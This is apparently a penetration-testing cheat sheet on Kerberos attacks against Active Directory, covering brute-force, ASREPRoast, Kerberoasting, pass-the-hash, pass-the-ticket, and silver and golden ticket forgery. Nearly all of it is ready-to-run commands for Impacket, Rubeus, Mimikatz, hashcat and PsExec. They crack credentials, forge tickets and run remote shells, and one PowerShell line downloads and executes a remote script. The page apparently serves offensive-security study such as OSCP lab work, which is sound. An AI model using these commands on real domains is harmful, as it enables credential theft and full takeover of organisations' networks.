Kerberos Attack
January 2020

Introduction

Kerberos is an authentication protocol that used to identify a user with provided the secret code, but it does not provide the validation on the resources access. Kerberos is used in Active Directory.
The following are the attack strategy according to the privileges you have. Thus, perform the first attacks only connectivity with the DC (Domain Controller) is required, which is the KDC (Key Distribution Center) for the AD (Active Directory) network. Whereas, the last attack requires a user being a Domain Administrator or having similar privileges.
  • Kerberos brute-force
  • ASREPRoast
  • Kerberoasting
  • Pass the key
  • Pass the ticket
  • Silver ticket
  • Golden ticket

Kerberos Attack Methods

Tools

Bruteforcing

1
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
Copied!

ASREPRoast

1
# check ASREPRoast for all domain users (credentials required)
2
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
3
4
# check ASREPRoast for a list of users (no credentials required)
5
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
6
7
8
# Cracking with dictionary of passwords:
9
10
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_list_file>
11
12
john --wordlist=<passwords_list_file> <AS_REP_responses_file>
Copied!

Kerberoasting

With Impacket example GetUserSPNs.py:
1
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
Copied!
With Powershell:
1
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
2
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Copied!
Cracking with dictionary of passwords:
1
hashcat -m 13100 --force <TGSs_file> <passwords_file>
2
3
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
Copied!

Pass The Hash (PtH)

By using Impacket examples
Lab Example: OSCP Lab SV-DC01, SVCClient17x (10.11.1.20 - 10.11.1.24)
1
# Request the TGT with hash
2
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
3
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
4
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
5
# Request the TGT with password
6
python getTGT.py <domain_name>/<user_name>:[password]
7
# If not provided, password is asked
8
9
# Set the TGT for impacket use
10
export KRB5CCNAME=<TGT_ccache_file>
11
12
# Execute remote commands with any of the following by using the TGT
13
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
14
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
15
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
With Rubeus and PsExec:
1
# Ask and inject the ticket
2
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
3
4
# Execute a cmd in the remote machine
5
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!

Pass The Ticket (PtT)

With Mimikatz:
1
mimikatz # sekurlsa::tickets /export
Copied!
With Rubeus in Powershell:
1
.\Rubeus dump
2
3
# After dump with Rubeus tickets in base64, to write the in a file
4
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
Copied!
To convert tickets between Linux/Windows format with ticket_converter.py:
1
python ticket_converter.py ticket.kirbi ticket.ccache
2
python ticket_converter.py ticket.ccache ticket.kirbi
Copied!

Using ticket in Windows

Inject ticket with Mimikatz:
1
mimikatz # kerberos::ptt <ticket_kirbi_file>
Copied!
Inject ticket with Rubeus:
1
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Copied!
Execute a cmd in the remote machine with PsExec:
1
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!

Silver ticket

With Impacket examples:
1
# To generate the TGS with NTLM
2
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
3
4
# To generate the TGS with AES key
5
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
6
7
# Set the ticket for impacket use
8
export KRB5CCNAME=<TGS_ccache_file>
9
10
# Execute remote commands with any of the following by using the TGT
11
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
12
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
13
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
With Mimikatz:
1
# To generate the TGS with NTLM
2
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
3
4
# To generate the TGS with AES 128 key
5
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
6
7
# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
8
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
9
10
# Inject TGS with Mimikatz
11
mimikatz # kerberos::ptt <ticket_kirbi_file>
Copied!
Inject ticket with Rubeus:
1
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Copied!
Execute a cmd in the remote machine with PsExec:
1
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!

Golden ticket

With Impacket examples:
1
# To generate the TGT with NTLM
2
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
3
4
# To generate the TGT with AES key
5
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
6
7
# Set the ticket for impacket use
8
export KRB5CCNAME=<TGS_ccache_file>
9
10
# Execute remote commands with any of the following by using the TGT
11
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
12
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
13
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
With Mimikatz:
1
# To generate the TGT with NTLM
2
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
3
4
# To generate the TGT with AES 128 key
5
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
6
7
# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
8
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
9
10
# Inject TGT with Mimikatz
11
mimikatz # kerberos::ptt <ticket_kirbi_file>
Copied!
Inject ticket with Rubeus:
1
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Copied!
Execute a cmd in the remote machine with PsExec:
1
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!

Reference Link- How does Kerberos work?

Kerberos (I): How does Kerberos work? - Theory
Tarlogic Security - Cyber Security and Ethical hacking
Last modified 1yr ago